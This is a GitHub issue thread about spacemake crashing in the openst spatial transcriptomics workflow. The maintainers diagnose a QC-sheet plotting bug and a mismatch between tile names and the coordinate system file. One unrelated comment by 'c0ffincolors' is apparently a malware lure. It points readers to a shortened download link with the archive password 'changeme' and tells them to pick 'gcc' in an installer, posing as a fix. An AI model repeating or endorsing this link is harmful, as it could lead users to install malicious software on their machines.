### ISSUE TITLE
Spacemake run crashes 

### ISSUE THREAD

**Issue by varsha090597** [rajewsky-lab/openst#57]
Hi,

When I tried running the spacemake run command after initializing and configuring I get the following error which wasn't very intuitive. It would be very helpful if you could point me to what exactly is going wrong. Thanks!

![Screenshot from 2024-08-27 12-03-38](https://github.com/user-attachments/assets/bcfbdac9-6705-4c3c-b61d-b69f9475eb42)

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by danilexn** [comment]
Hi!

Thanks for opening this issue! It is a bug related to the generation of plots for QC sheets and automated analysis (with R). We're exploring why this is the case (might have to do with some tiles having an unexpected number of spatial units). 

If you run `spacemake` with the `--keep-going` flag, this will generate all files that are necessary for proceeding with the `openst` workflow (except these QC sheets, which can be anyway generated externally e.g. with `scanpy`)

**Comment by varsha090597** [comment]
Thanks for your response! I tried running it with the --keep-going flag and it ran past the qc sheet creation step. But now it gives me a different error:

<img width="1386" alt="Screenshot 2024-08-30 at 11 48 33 AM" src="https://github.com/user-attachments/assets/5e423968-a057-4b0b-b6c6-acf914654677">
<img width="1401" alt="Screenshot 2024-08-30 at 11 48 57 AM" src="https://github.com/user-attachments/assets/82f61c27-1573-40c9-b150-cf000fa3243e">

It also says that pandoc version of 1.12.3 or higher is required but I already have version 2.4 installed in my conda environment so I do not understand why I get that error either.

**Comment by nukappa** [comment]
Hi @varsha090597, the first error is related to the stitching of individual tiles into a larger area and is likely related to your coordinate system file. Can you verify if the your coordinate system file you have contains the `sample_ 2175` etc? If you use the one shipped with spacemake/openst then you have to modify it.

The second error occurs during the automated analysis, which is also not a critical step -- you can do it with scanpy for instance. It did find only 1 cluster in the data though, which might be not what you were expecting.

**Comment by varsha090597** [comment]
Thank you! You mentioned checking if sample_2175 exists in my coordinate system file. I used the openst_coordinate_system.csv file that is shipped with spacemake and this is how it looks when I opened it:
![Screenshot from 2024-09-04 11-31-04](https://github.com/user-attachments/assets/e0a42ada-dfe2-4f5d-b14f-d3b6471268eb)
Could you point me to where exactly I need to modify this file to include sample_2175? There are multiple spatial barcode coordinate files that get generated from step 1 of the openst run with sample_2175 being one of them. Should they also be included in the coordinate system file?

**Comment by nukappa** [comment]
Yes, you basically need to modify the coordinate system file so that the rows match the names of the files you have. For instance, if the `sample_2175` comes from, say, lane 1, then you'd need to modify that row in the coordinate system from `fc_1_L1_tile_2175` to `sample_2175`. You should have gotten about ~3,750 tiles from 4 lanes from step 1 of the openst run.

**Comment by danilexn** [comment]
Hi! What is the status of this?
